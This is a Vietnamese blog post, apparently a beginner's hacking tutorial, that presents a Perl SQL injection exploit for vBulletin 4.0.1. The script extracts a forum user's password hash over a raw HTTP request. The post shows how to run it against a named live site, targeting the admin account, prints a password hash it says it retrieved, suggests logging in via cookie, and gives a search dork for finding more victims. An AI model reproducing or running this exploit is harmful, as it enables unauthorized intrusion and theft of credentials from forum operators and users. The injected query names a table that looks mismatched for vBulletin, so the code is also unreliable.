chia sẻ

Exploit vbb 4.0.x bằng perl cho newbie

hạy perl xong
Tạo file perl với nội dung

 #!/usr/bin/perl
use IO::Socket;

print q{
#######################################################################
#    vBulletin? Version 4.0.1 Remote SQL Injection Exploit                                      #
#                    By th3.g4m3_0v3r                                                                          #
#              our Site www.h4ck3r.in                                                                         #
#           www.hackingcrackingtricks.blogspot.com                                                  #
#           Indian (th3.g4m3_0v3r@yahoo.com)                                                          #
#          Dork: Powered by vBulletin? Version 4.0.1                                                  #          

#######################################################################
};
if (!$ARGV[2]) {
print q{
    Usage: perl  VB4.0.1.pl host /directory/ victim_userid

       perl  VB4.0.1.pl www.vb.com /forum/ 1

};
}


$server = $ARGV[0];
$dir    = $ARGV[1];
$user   = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid   = $ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>]    DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path  = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ? ?,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ;

print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";


print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{

  if ($1 ne 0) {
   print "Password is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";

      }
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";

Lưu ví dụ như capuchino.pl hihi

Tìm 1 site vbb 4.0.x
Mình ví dụ ở đây là http://www.flashyworld.com/vb/index.php

mở cmd lên,vào thư mục lưu file capuchino.pl
chạy capuchino.pl flashyworld.com /vb/ 1
cấu trúc ở đây là file.pl site.com /folderforum/ userid
userid admin thì thường là 1
sau khi chạy thì ta thấy






Pass nhận đc là : e714ad492ee5e2d84bca13c17fd6464a vào bằng cookie thôi

dork tìm victim :"Powered by vBulletin® Version 4.0.1"
bonus thêm 1 victim còn khai thác đc
 





Capuchino - VHB Group

Không có nhận xét nào:

Đăng nhận xét

 
Ky nang ban hang ky-nang-ban-hang
10 10 1125 (c) by
Google Thủ thuật, hacking, tool, code, công cụ